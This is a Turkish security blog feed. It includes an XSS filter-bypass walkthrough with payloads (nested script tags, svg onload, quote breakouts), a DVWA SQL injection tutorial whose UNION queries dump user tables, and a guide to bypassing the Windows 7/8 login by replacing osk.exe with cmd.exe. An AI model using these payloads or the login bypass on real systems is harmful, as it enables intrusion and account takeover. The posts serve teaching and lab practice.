<p>Tagı büyük olarak yazıp bypass edebileceğimiz gibi <strong><sc<script>ript>alert(1)</sc</script>ript></strong> gibi iç içe script payloadı yazarakta çalışmakta.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/2-4.png"><img class="size-large wp-image-601 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/2-4-1024x512.png" alt="2-4" width="976" height="488" /></a></p>
<p>Sayfa kaynağında görüldüğü gibi bir script filtrelenirken iç içe yazdığımız için istediğimiz kod haline gelmektedir.script taglar filtrelendiğinde bu şekilde aşabileceğiniz gibi içinde script tagı bulunmayan payloadlarda deneyebilirsiniz.</p>
<p><strong>Example 3:</strong></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/3-1.png"><img class="size-large wp-image-602 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/3-1-1024x169.png" alt="3-1" width="976" height="161" /></a></p>
<p>Bu örnekte büyük SCRIPT tagınıda engellemiş yazılımcı fakat yine iç içe script tagı yazarak aşabilmekteyiz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/3-2.png"><img class="size-large wp-image-603 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/3-2-1024x206.png" alt="3-2" width="976" height="196" /></a></p>
<p>Bu örnekte script tagları engellendiği için içinde script tagı bulunmayan <strong><svg onload=alert(1)></strong> gibi bir payload girerek yine alert aldırabiliriz.</p>
<p> </p>
<p><strong>Example 4:</strong></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/4-1.png"><img class="size-large wp-image-604 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/4-1-1024x168.png" alt="4-1" width="976" height="160" /></a></p>
<p>Bu örnektede <strong><svg onload=alert(1)></strong> payloadı ile alert alınabilmekte.</p>
<p><strong>Example 5:</strong></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/5-1.png"><img class="size-large wp-image-605 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/5-1-1024x187.png" alt="5-1" width="976" height="178" /></a></p>
<p>Bu örnekte <strong><svg onload=alert(1)></strong> payloadını girdiğimizde error vermekte.Yazılımcı alert fonksiyonunda hata verdirmiş arkadaşlar.Bunun için bizde alert ile aynı işi gören <strong>prompt</strong> kullanarak aşacağız.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/5-2.png"><img class="size-large wp-image-606 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/5-2-1024x166.png" alt="5-2" width="976" height="158" /></a></p>
<p>Bu örneğide <strong> <svg onload=prompt(1)></strong> payloadı ile çözülebilmekte.</p>
<p> </p>
<p><strong>Example 6:</strong></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/6-1.png"><img class="size-large wp-image-607 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/6-1-1024x210.png" alt="6-1" width="976" height="200" /></a></p>
<p><strong><svg onload=alert(1)></strong> payloadımızı girdiğimizde bir hata yada ekrana bir pop-up oluşmadı.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/6-2.png"><img class="size-large wp-image-608 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/6-2-1024x535.png" alt="6-2" width="976" height="510" /></a></p>
<p>Sayfa kaynağını görüntülediğimizde ise girdiğimiz değişkeni bir değişkene atandığını görmekteyiz.Bu yüzden kodlarımız çalışmıyor.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/6-3.png"><img class="size-large wp-image-609 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/6-3-1024x174.png" alt="6-3" width="976" height="166" /></a></p>
<p>Fakat payload olarak<strong> ”; alert(1);”</strong> girdiğimizde önce değişkeni kapatıp sonra diğer “ nığı kapatarak syntax hatası almadan alertimizi bastırdık.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/6-4.png"><img class="size-large wp-image-610 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/6-4-1024x536.png" alt="6-4" width="976" height="511" /></a></p>
<p>49.satıra dikkatli bakarsak payloadımızı ve yazılımcının filtresini nasıl bypass ettiğimizi görebilirsiniz.</p>
<p> </p>
<p><strong>Example 7:</strong></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/7-1.png"><img class="size-large wp-image-611 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/7-1-1024x545.png" alt="7-1" width="976" height="519" /></a></p>
<p>Bu örnekte sayfa kaynağını görüntülediğimizde bir önceki gibi olduğunun sadece çift tırnak yerine tek tırnak kullanıldığı görülmektedir.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/7-2.png"><img class="size-large wp-image-612 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/7-2-1024x237.png" alt="7-2" width="976" height="226" /></a></p>
<p> </p>
<p>Payload olarak <strong> ’; alert(1);’ </strong>girdiğimizde yine hedefimize ulaşmış olmaktayız.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/7-3.png"><img class="size-large wp-image-613 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/7-3-1024x545.png" alt="7-3" width="976" height="519" /></a></p>
<p>Sayfa kaynağında 50.satırda bunu görebilmekteyiz.</p>
<p> </p>
<p><strong>Example 8:</strong></p>
<p>Bu örnekte durum farklı artık bir parametreye değilde html form a payload girmemiz gerekiyor.Sayfanın kaynağını görüntüleyip inceliyoruz.<strong>/xss/example8.php </strong>bağlantısı sayfa içinde yineleniyor.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/8-0.png"><img class="size-large wp-image-614 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/8-0-1024x239.png" alt="8-0" width="976" height="228" /></a></p>
<p>Payload olarak<strong> /” onmouseover=”alert(1); </strong>girildiğinde mouse ile üstüne geldiğimizde pop-upımız açılacaktır.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/8-11.png"><img class="size-large wp-image-617 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/8-11-1024x540.png" alt="8-1" width="976" height="515" /></a></p>
<p> </p>
<p><strong>Example 9:</strong></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/10/9-1.png"><img class="size-large wp-image-618 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/10/9-1-1024x183.png" alt="9-1" width="976" height="174" /></a></p>
<p> </p>
<h1 id="işaretinden-sonra-scriptalert1script-payloadı-girerek-sayfayı-yenilediğimizde-alert-ekrana-yansıyacaktırbu-yazının-başında-değindiğim-dom-xss-türüdür">işaretinden sonra <script>alert(1)</script> payloadı girerek sayfayı yenilediğimizde alert ekrana yansıyacaktır.Bu yazının başında değindiğim Dom XSS türüdür.</h1>
<p> </p>
<p>Genel olarak XSS i tanıyarak bir kaç bypass yolunu örneklerle inceledik.İnşallah faydalı olmuştur.Bir çok XSS payloadı bulunmakta ve türemekte duruma koda göre BugBounty (Bugcrowd,HackerOne vb.) ile uğraşan arkadaşlar kendilerini geliştirip çok farklı payloadlar bulmaktadır.Bir çok XSS Payloadına <a href="https://packetstormsecurity.com/files/112152/Cross-Site-Scripting-Payloads.html">https://packetstormsecurity.com/files/112152/Cross-Site-Scripting-Payloads.html</a> adresinden ulaşabilirsiniz.</p>
<p><strong>XSS i Nasıl Engelleyebiliriz?</strong></p>
<p>Birde buradaki örnekte gördüğünüz gibi <strong>Blacklist</strong> yöntemi ile XSS den korunmaya çalışılmış.Siz neyi filtrelerseniz filtreleyin saldırgan bir şekilde bypass edebilmekte.Bunun için <strong>Whitelist </strong> metodu kullanılarak ne gerekli ise o alınmalı onun dışındaki her şey engellenmelidir.</p>
<p>Başka bir yazıda görüşmek üzere :)</p>
Man in the Middle Attack (Ortadaki Adam Saldırısı)2016-10-25T14:06:00+00:00ahmetgurel.github.io/man%20in%20the%20middle%20attack/network%20pentest/ortadaki%20adam%20sald%C4%B1r%C4%B1s%C4%B1/siber%20g%C3%BCvenlik/s%C4%B1zma%20testi%20ara%C3%A7lar%C4%B1%20(pentest%20tools)/2016/10/25/man-in-the-middle-attack-ortadaki-adam-sald%c4%b1r%c4%b1s%c4%b1<p><strong>Man in the Middle Attack (Ortadaki Adam Saldırısı)</strong></p>
<iframe width="595" height="485" style="border: 1px solid #CCC; border-width: 1px; margin-bottom: 5px; max-width: 100%;" src="//www.slideshare.net/slideshow/embed_code/key/9l8hqOWOVPgyTn" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" allowfullscreen="allowfullscreen"> </iframe>
<div style="margin-bottom: 5px;"><strong> <a title="Man in the Middle Atack (Ortadaki Adam Saldırısı)" href="//www.slideshare.net/AhmetGrel1/man-in-the-middle-atack-ortadaki-adam-saldrs" target="_blank">Man in the Middle Atack (Ortadaki Adam Saldırısı)</a> </strong> from <strong><a href="//www.slideshare.net/AhmetGrel1" target="_blank">Ahmet Gürel</a></strong></div>
Ağ Sızma Testine Giriş Dökümanı2016-07-27T19:53:00+00:00ahmetgurel.github.io/a%C4%9F%20s%C4%B1zma%20testi/bilgi%20toplama/footprinting/hacking/kali%20linux/linux/metasploit/metasploitable/network%20pentest/network%20s%C4%B1zma%20testi/network%20temelleri/nmap/pentest/siber%20g%C3%BCvenlik/s%C4%B1zma%20testi/s%C4%B1zma%20testi%20ara%C3%A7lar%C4%B1%20(pentest%20tools)/the%20harvester/white%20hat%20hacker/2016/07/27/a%c4%9f-s%c4%b1zma-testine-giri%c5%9f-d%c3%b6k%c3%bcman%c4%b1<p>Döküman Siber Güvenlik ve Sızma Testleri üzerine kariyer yapmak isteyenler için en temelde alınarak basit düzeyde Ağ Sızma Testinin nasıl yağılacağı ve nasıl öğrenileceğini belirten bir giriş niteliğinde dökümandır.</p>
<p><strong>Eğitim Konuları:</strong></p>
<p>-Sanal Lab Ortamının Kurulması (VMware üzerine Kali 2.0 ve Metasploitable2)
-Temel Linux Sistem Bilgisi
-Temel Network Bilgisi
-Aktif ve Pasif Bilgi Toplama
-Temel Nmap Kullanımı
-Temel Metasploit Kullanımı
-Açıklık Tarama Araçları Kullanımı
-Uygulamalı Sızma Testi Örnekleri</p>
<p style="text-align: justify;"><iframe width="595" height="485" style="border: 1px solid #CCC; border-width: 1px; margin-bottom: 5px; max-width: 100%;" src="//www.slideshare.net/slideshow/embed_code/key/DvtV7SKQYLE3b" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" allowfullscreen="allowfullscreen"> </iframe></p>
<div style="margin-bottom: 5px;"><strong> <a title="Temel Ağ Sızma Testine Giriş Dökümanı" href="//www.slideshare.net/secret/DvtV7SKQYLE3b" target="_blank">Temel Ağ Sızma Testine Giriş Dökümanı</a> </strong> from <strong><a href="//www.slideshare.net/AhmetGrel1" target="_blank">Ahmet Gürel</a></strong></div>
Bir Dönemin Özeti IEEE Computer Society ve Diğerleri...2016-02-12T00:34:00+00:00ahmetgurel.github.io/hayattan%20gelenler/ieee/java/linux/sdu/sdu%20ieee%20cs/siber%20g%C3%BCvenlik/2016/02/12/bir-d%c3%b6nemin-%c3%b6zeti-ieee-computer-society-ve-di%c4%9ferleri<p>Merhaba arkadaşlar şöyle bir bloğumun olduğu aklıma geldi ve uzunca bir zamandır teknik veya sosyal bir konuda bir şey yazmadığımı fark ettim.Yoğun geçen bir dönem oldu kısaca neler yaptık neler yapacağız biraz bahsetmek istedim.</p>
<p>Bizim sektörde diplomadan çok,bir alan seçip uzmanlaşmak önemli,hatta diplomadan daha önemli bu yüzden okulun yanında son bir kaç yıldır Linux sistemler ve Siber güvenlik üzerine kendimi geliştirip bu alanda çalışmak istiyorum.Benim kendimi gelişitrmemde ki en büyük katkıyı muhtemelen yaz stajıma, Linux Yaz Kampına ve Akademik Bilişim gibi organizasyonlarda ki kurslara borçluyum.Bu konuda benim gibi öğrenci arkadaşlarımdan çok soru geliyor nasıl başlayalım ne yapalım gibi kendiniz kurcamalayarak ve internetteki çoğu kaynağı okuyarak başlayıp bu etkinlikteki kurlar ve güzel bir staj bulmanıza oda iyi bir iş hayatı sağlayacaktır bunuda burada söylemiş olayım :)Bu sene okulumdaki bütünleme sınav tarihleriyle Akademik Bilişim kurslarının tarihlerinin denk gelmesiydi malesef bu yıl Akademik Bilişim e katılamadım.Fakat BGA nın Siber Güvenlik Kış Kampı nın sınavına girdim ve şuan Sakaryada bu kampta bulunmaktayım.Kamp sonunda detaylı güzel bir yazı paylaşmayı düşünüyorum.</p>
<p>Bunun dışında ingilizcesiz hiç bir şey olmayacağını bi yerde tıkanıp kalacağımı gördüğümden ingilizcemi daha iyi hala getirmek için dil kursuna yazıldım.Teknik kısmımdan çok daha önemli bir olay göz ardı etmemeliyiz bence.Bunlar devam ederken okulumuzda Süleyman Demirel Üniv. IEEE kulübü yeniden aktif oldu ve Computer Society komitesini kurmak istedim.Bu kulübün başkanlığını aldım güzel bir ekip kurarak hemen çalışmalara başladık.Cidden geç kurulup 2 ay aktif olarak çalışan bir kulüp olmamıza rağmen 2 tane sürekli hafta sonu kursu 2 tane workshop ve 1 tane seminer ile kapattık.Bizim için güzel bir başaraydı gerçekten kendim yoğundum bunları başarmamızda güçlü bir ekibin emeği var buradan tüm SDU IEEE Computer Society ekibine çok teşekkür ediyorum.Yazımın bundan kısmında <a href="https://www.facebook.com/SDUIEEECS/">SDU IEEE Computer Soicety</a> kulübünü yaptığımız ve yapacağımız etkinliklerden bahsetmek istiyorum.</p>
<p>Linux’a Giriş ve Java ile Programlamaya Giriş kurslarını açtık.Linux u ben Javayıda Celal Baydar verdi.Bölüm derslerinde zorlanan arkadaşların sağlam bir alt yapı oturması için böyle kurslar açıp arkadaşlarımıza elimizden geldiğince yardım etmeye çalıştık.</p>
<p>[caption id=”attachment_551” align=”aligncenter” width=”976”]<a href="http://www.gurelahmet.com/wp-content/uploads/2016/02/DSC_0017.jpg"><img class="wp-image-551 size-large" src="http://www.gurelahmet.com/wp-content/uploads/2016/02/DSC_0017-1024x680.jpg" alt="DSC_0017" width="976" height="648" /></a> Linux Kursumuz[/caption]</p>
<p> </p>
<p>[caption id=”attachment_552” align=”aligncenter” width=”976”]<a href="http://www.gurelahmet.com/wp-content/uploads/2016/02/DSC_0038.jpg"><img class="wp-image-552 size-large" src="http://www.gurelahmet.com/wp-content/uploads/2016/02/DSC_0038-1024x680.jpg" alt="DSC_0038" width="976" height="648" /></a> Java Kursumuz[/caption]</p>
<p> </p>
<p>Kurslarımızın dışında bir tane JavaFX ile Programlama workshop u bir tanede Arduino ile Işık Kontrolü adlı workshop düzenledik.</p>
<p>[caption id=”attachment_553” align=”aligncenter” width=”960”]<a href="http://www.gurelahmet.com/wp-content/uploads/2016/02/12219355_565496653598711_5256164437180215212_n.jpg"><img class="wp-image-553 size-full" src="http://www.gurelahmet.com/wp-content/uploads/2016/02/12219355_565496653598711_5256164437180215212_n.jpg" alt="12219355_565496653598711_5256164437180215212_n" width="960" height="720" /></a> JavaFX Workshop[/caption]</p>
<p> </p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/02/afişson.jpg"><img class="wp-image-554 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/02/afişson-576x1024.jpg" alt="afişson" width="429" height="762" /></a></p>
<p>[caption id=”attachment_555” align=”alignnone” width=”976”]<a href="http://www.gurelahmet.com/wp-content/uploads/2016/02/IMG_3585.jpg"><img class="wp-image-555 size-large" src="http://www.gurelahmet.com/wp-content/uploads/2016/02/IMG_3585-1024x683.jpg" alt="IMG_3585" width="976" height="651" /></a> Arduino Worksop[/caption]</p>
<p> </p>
<p>Ve son olarakda geçen dönem “Liselere Farkındalık” projesini hayata geçirdik.Meslek seçiminde mesleklerin tam bilinmemesi,hayatın her alanının bilgisayar ve internete döküldüğü bu zamanda ne iş yaptıklarını ne alanlarda çalıştıklarını anlatmaya ve Siber Güvenlik farkındalığı oluşturmak için projeye ilk olarak Isparta Anadolu Lisesi ile başladık.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/02/afisseminer.jpg"><img class=" wp-image-556 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2016/02/afisseminer-723x1024.jpg" alt="afisseminer" width="657" height="931" /></a></p>
<p> </p>
<p>[caption id=”attachment_558” align=”alignnone” width=”976”]<a href="http://www.gurelahmet.com/wp-content/uploads/2016/02/IMG_3232.jpg"><img class="wp-image-558 size-large" src="http://www.gurelahmet.com/wp-content/uploads/2016/02/IMG_3232-1024x683.jpg" alt="IMG_3232" width="976" height="651" /></a> Liselere Farkındalık Semineri[/caption]</p>
<p> </p>
<p>Bu dönemi bu etkinlikler ile kapadık.İkinci dönemde ilk dönemki Java kursumuz devam edecek ve yanında C# kursu açılacak.İkinci dönem kendim okulda kısmı zamanla işe başlayacağımden ve iki tane arkadaşım ile Türkiyede ve Ispartada yaygınlaşan Evden Kaçış Oyunu olan <a href="https://www.facebook.com/doktorunlaneti">Doktorun Laneti</a> adında bir oyunu Ispartada açtık.Bu yoğun tempoda yeterli zamanımın bulunmamasından dolayı Linux kursu malesef devam edemeyecek fakat boş olduğum zamanları ayarlayıp Linux,Siber Güvenlik,Git ve Wordpress üzerine günü birlik workshoplar düşüünüyorum.Bunların yanında şehir dışına konferanslara ve teknik gezilere gitmeyi planlamaktayız.Bunların hepsini SDU IEEE Computer Society facebook <a href="https://www.facebook.com/SDUIEEECS/">sayfasından</a> takip edebilirsiniz ) Yoğun bir dönem geçirdim çok daha bir döneme başlayacağım inşallah bu dönem sonunda yazı bloguma tekrar geri dönüp öğrendiğim şeyleri paylaşacağım :)</p>
<p> </p>
<p style="text-align: center;">Ve SDU IEEE Computer Society ekibi :)</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2016/02/1.jpg"><img class="alignnone size-large wp-image-560" src="http://www.gurelahmet.com/wp-content/uploads/2016/02/1.jpg" alt="1" width="960" height="640" /></a> <a href="http://www.gurelahmet.com/wp-content/uploads/2016/02/2.jpg"><img class="alignnone size-large wp-image-561" src="http://www.gurelahmet.com/wp-content/uploads/2016/02/2.jpg" alt="2" width="960" height="574" /></a></p>
<p> </p>
<p>Bu güzel çalışmaları yapıp,diğer projelerimizde ve fikirlerimizde yardımcı olup destek veren sevgili arkadaşlarım SDU IEEE Başkanı Can Baran Morkoç’a ve IEEE Türkiye Computer Society Başkanı Bahadır Kınalı’ya da teşekkür ederim.</p>
<p> </p>
Windows 7 ve 8 Sistemlerde Şifre Bypass2015-10-25T13:46:00+00:00ahmetgurel.github.io/genel%20g%C3%BCvenlik/siber%20g%C3%BCvenlik/windows/windows%207%20kullan%C4%B1c%C4%B1%20%C5%9Fifresi/windows%20hacking/windows%20password%20bypass/windows%20%C5%9Fifre%20k%C4%B1rma/2015/10/25/windows-7-ve-8-sistemlerde-%c5%9fifre-bypass<p>Windows 7 ve ya 8 kullanıyorsanız sistem açılışta size parola sorduğu kısımda sol altta erişebilirlik var ve oradan büyüteç,ekran klavyesi gibi araçları çalıştırabiliyoruz.Bu böyle baktığımızda gereksiz gibi görünsede sisteme parola girmeden önce C nin altında Windows klasörünün içinde System32 klasöründen bir .exe çalıştırıyor.Ve biz ekran klavyesi yerine konsol exe sini çağırısak durum biraz farklı olabilir.Oradan istediğimiz bir komut ile sisteme yeni bir kullanıcı ve şifre atayabiliriz bunlar size kalmış.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/10/1.png"><img class="alignnone size-large wp-image-535" src="http://www.gurelahmet.com/wp-content/uploads/2015/10/1-1024x495.png" alt="1" width="976" height="472" /></a></p>
<div class="separator">Yukarıda ki resimde şifreli bir windows 7 işletim sisteminde ekran klavyesi açık.Buradan sonra biz bu ekran klavyesi yerine cmd.exe yani konsol u açacağız.Bunun için yapmamız gerekenler şöyle:</div>
<div class="separator"></div>
<ul>
<li>Bir tane live linux cd yada flash hazırlamak</li>
<li>Linux işletim sistemini BIOS dan ayarları yapıp açmak</li>
<li>Linux açıldıktan sonra tüm disk bölümlerini görecektir windows un kurulu olduğu disk ve varsa diğer bölümleri</li>
<li>Windows un kurulu olduğu disk bölümüne girerek windows klasörünün altındaki System32 klasörüne gireceğiz.</li>
<li>Burada ekran klavyesinin olan osk.exe klasörünün adını değiştirmeliyiz ve cmd.exe yi linux masaüstüne kopyalayıp adını osk.exe yaptıktan sonra yeniden System32 klasörünün içine kopyalamalıyız.</li>
<li>Burada ekran klavyesinin yerine konsol yani cmd.exe çalıştırmış bulunmaktayız.</li>
<li>Konsoldan net user kullanıcı_adi yeni_şifre şeklinde bir komut girdiğimizde o kullanıcı adının şifresini kırıp kendiniz belirlemiş bulunmaktasınız.</li>
</ul>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/10/2.jpg"><img class="alignnone size-full wp-image-536" src="http://www.gurelahmet.com/wp-content/uploads/2015/10/2.jpg" alt="2" width="960" height="720" /></a></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/10/3.jpg"><img class="alignnone size-full wp-image-537" src="http://www.gurelahmet.com/wp-content/uploads/2015/10/3.jpg" alt="3" width="960" height="720" /></a></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/10/4.png"><img class="alignnone size-full wp-image-538" src="http://www.gurelahmet.com/wp-content/uploads/2015/10/4.png" alt="4" width="961" height="338" /></a></p>
<p>Resimde linux işletim sistemi ile System32 klasöründeki değiştireceğimiz .exe ler görünüyor.Bu işlemleri adım adım yaptıktan sonra sistemi yeniden başlatıp windows u açmanız ve parola sorduğu kısımda ekran klavyesini çalıştıra tıklamanız gerekmektedir.Bu işlem sonucunda karşınıza ekran klavyesi yerine konsol gelmesi gerekmektedir.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/10/5.jpg"><img class="alignnone size-large wp-image-539" src="http://www.gurelahmet.com/wp-content/uploads/2015/10/5-1024x768.jpg" alt="5" width="976" height="732" /></a></p>
<p>Bu ekran karşımıza geldiğinde net user kullanıcı_adi yeni_şifre şeklinde komut girerek unuttuğunuz yada bilmediğiniz bir şifreyi yeni belirlediğiniz şifre ile değiştirmiş olacaksınız.</p>
Ubuntu'ya Burp Suite Kurulumu2015-09-12T19:03:00+00:00ahmetgurel.github.io/burp%20suite/burpsuite%20kurulum/linux%20ubuntu/linux%20ubuntu%20burpsuite%20kurulumu/siber%20g%C3%BCvenlik/s%C4%B1zma%20testi%20ara%C3%A7lar%C4%B1%20(pentest%20tools)/ubuntu/2015/09/12/ubuntuya-burp-suite-kurulumu<p>Burpsuite sızma testlerinde ve bir siteyi incelemek istediğimizde en çok kullanılan web proxy uygulamalarından birisidir.Free ve Professional olarak iki sürümü mevcuttur.Kali de Free versiyonu kurulu olarak gelmektedir.Bu yazıda bende günlük hayatta ubuntu kullandığım için Ubuntuda Burpsuite kurulumunu göstereceğim.</p>
<p>İlk olarak Burpsuite çalışabilmesi için OpenJDK nın kurulu olması gerekmekte.</p>
<p><span class="geshifilter"><code class="java geshifilter-java">sudo apt-get update </code></span></p>
<p><span class="geshifilter"><code class="java geshifilter-java">sudo apt-get install openjdk-7-jdk openjdk-7-jre </code></span></p>
<p>komutları ile OpenJDK kurulumunu yapıyoruz.</p>
<p>Daha sonra <a href="https://portswigger.net/burp/download.html">https://portswigger.net/burp/download.html</a> adresine giderek Burpsuite Free Edition ı indiriyoruz.(Tabi lisanslı alacaksanız Professional ı da seçebilirsiniz malum öğrencilik :) )</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/09/21.png"><img class="alignnone size-large wp-image-527" src="http://www.gurelahmet.com/wp-content/uploads/2015/09/21-1024x579.png" alt="2" width="976" height="552" /></a></p>
<p> </p>
<p>Eğer yolunu değiştirmediyseniz <strong>burpsuite_free_v1.6.25.jar</strong> adlı jar dosyası <strong>Downloads</strong> klasörüne inmiştir.Son olarak</p>
<p><span class="geshifilter"><code class="java geshifilter-java"> cd Downloads </code></span></p>
<p><span class="geshifilter"><code class="java geshifilter-java">sudo java -jar -Xmx2g burpsuite_free_v1.6.25.jar </code></span></p>
<p>komutları ile Burpsuite i açmış olacaksınız.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/09/22.png"><img class="alignnone size-large wp-image-530" src="http://www.gurelahmet.com/wp-content/uploads/2015/09/22-1024x554.png" alt="2" width="976" height="528" /></a></p>
Dvwa Sql Injection B%c3%b6l%c3%bcm%c3%bc Cevaplar%c4%b1 Level Low2015-09-02T00:00:00+00:00ahmetgurel.github.io/2015/09/02/dvwa-sql-injection-b%c3%b6l%c3%bcm%c3%bc-cevaplar%c4%b1-level-low
<hr />
<p>layout: post
title: DVWA-SQL Injection Cevapları Level: Low
date: 2015-09-02 16:52
author: ahmetgurel
comments: true
categories: [dvwa, dvwa cevapları, dvwa solutions, dvwa sql injection, dvwa sql injection cevapları, dvwa sql injection level low, dvwa sql injection solutions, kali linux dvwa, kaliye dvwa kurulumu, linux yaz kampı, Siber Güvenlik, Web Uygulama Güvenliği]
—</p>
<p>Yazıma başlamadan önce yeniden hatırlatmamda fayda var bu yaz Linux Yaz Kampında <a href="https://www.mehmetince.net/lyk-2015-web-uygulama-guvenligi-ve-guvenli-kod-gelistirme-kursu/"> Web Uygulama Güvenliği ve Güvenli Kod Geliştirme</a> kursuna katıldım.Orada öğrendiğim şeylerin bazılarını blogumdan paylaşmaya çalışıyorum.Başta <a href="https://twitter.com/mdisec">Mehmet İnce</a> ve <a href="https://twitter.com/Barknkilic">Barkın Kılıç</a> olmak üzere emeği geçen tüm hocalarımıza yeniden teşekkür ederim.Daha önceki yazımda DVWA nedir ve nasıl kurulur anlatmıştım.Bu yazımda ise DVWA ın SQL Injection bölümünün Low leveline ait kendi cevaplarımı buradan paylaşacağım.Bir önceki yazıya <a href="http://www.gurelahmet.com/dvwa-nedir-ve-linuxakali-kurulumu/"> buradan</a> ulaşıp DVWA sistemini kurabilirsiniz.</p>
<p>Cevaplara geçmeden önce levelinizin LOW olduğundan emin olunuz.</p>
<p><strong>SQL Injection Tespiti</strong></p>
<p>İlk olarak</p>
<p>[php] 1’ or ‘1’=’1 [/php]</p>
<p>denemesi ile SQL Injection tespiti yapıyoruz ve sorguların tek tırnak ile olduğunu</p>
<p>görüyoruz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/09/1.png"><img class="alignnone size-full wp-image-491" src="http://www.gurelahmet.com/wp-content/uploads/2015/09/1.png" alt="1" width="1011" height="709" /></a></p>
<p><strong>Veritabanındaki Kolon Sayısının Tespiti</strong></p>
<p>[php] 1’ UNION SELECT 1,2 # [/php]</p>
<p>sorgusu ile veritabanında iki kolon olduğunu gördük.</p>
<p> </p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/09/2.png"><img class="alignnone size-full wp-image-499" src="http://www.gurelahmet.com/wp-content/uploads/2015/09/2.png" alt="2" width="729" height="561" /></a></p>
<p> </p>
<p><strong>Veritabanının Versiyon Bilgisi</strong></p>
<p>[php]1’ UNION SELECT version(),2 # [/php]</p>
<p>sorgusu ilede versiyon bilgisini elde edebiliriz.</p>
<p> </p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/09/3.png"><img class="alignnone size-full wp-image-500" src="http://www.gurelahmet.com/wp-content/uploads/2015/09/3.png" alt="3" width="721" height="555" /></a></p>
<p><strong>Veritabanının İsim Bilgisi</strong></p>
<p>[php] 1’ UNION SELECT database(),2 # [/php]</p>
<p>sorgusu ilede database ismine ulaşabiliriz.</p>
<p> </p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/09/4.png"><img class="alignnone size-full wp-image-501" src="http://www.gurelahmet.com/wp-content/uploads/2015/09/4.png" alt="4" width="729" height="553" /></a></p>
<p><strong>Veritabanındaki Tabloların Belirlenmesi</strong></p>
<p>[php] 1’ UNION SELECT table_name,2 FROM information_schema.tables WHERE table_schema = ‘dvwa’ # [/php]</p>
<p>sorgusu ile daha önce bulduğumuz <strong>dvwa</strong> database ine ait tabloların isimlerine ulaşabiliriz.<a href="http://www.gurelahmet.com/wp-content/uploads/2015/09/5.png"><img class="alignnone size-full wp-image-502" src="http://www.gurelahmet.com/wp-content/uploads/2015/09/5.png" alt="5" width="770" height="554" /></a></p>
<p>Buradaki çıktıda<strong> dvwa</strong> veritabanında <strong>guestbook</strong> ve <strong>users</strong> olmak üzere iki adet tablo olduğunu gördük.</p>
<p><strong>Tabloların Kolonlarının Belirlenmesi</strong></p>
<p>[php] 1’ UNION SELECT column_name,2 FROM information_schema.columns WHERE table_schema=’dvwa’ AND table_name=’users’ # [/php]</p>
<p>sorgusu ile<strong> dvwa</strong> veritabanının <strong>users</strong> tablosunun kolonlarına ulaşabiliriz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/09/8.png"><img class="alignnone size-full wp-image-503" src="http://www.gurelahmet.com/wp-content/uploads/2015/09/8.png" alt="8" width="783" height="561" /></a></p>
<p>Bu çıktıda ise dediğimiz gibi <strong>dvwa</strong> veritabanının <strong>users</strong> tablosunun <strong>user_id</strong>,<strong>first_name</strong>,<strong>last_name</strong>,<strong>user</strong>,<strong>password</strong>,<strong>avatar</strong> adlı kolonlarının olduğunu görmüş olduk.</p>
<p><strong>Tablolardaki Verileri Ekrana Yazdırma</strong></p>
<p>[php] 1’ UNION SELECT first_name,last_name FROM users # [/php]</p>
<p>sorgusu ilede <strong>dvwa</strong> veritabanındaki <strong>users</strong> tablosundan <strong>first_name</strong> ve <strong>last_name</strong> verilerini çektik.</p>
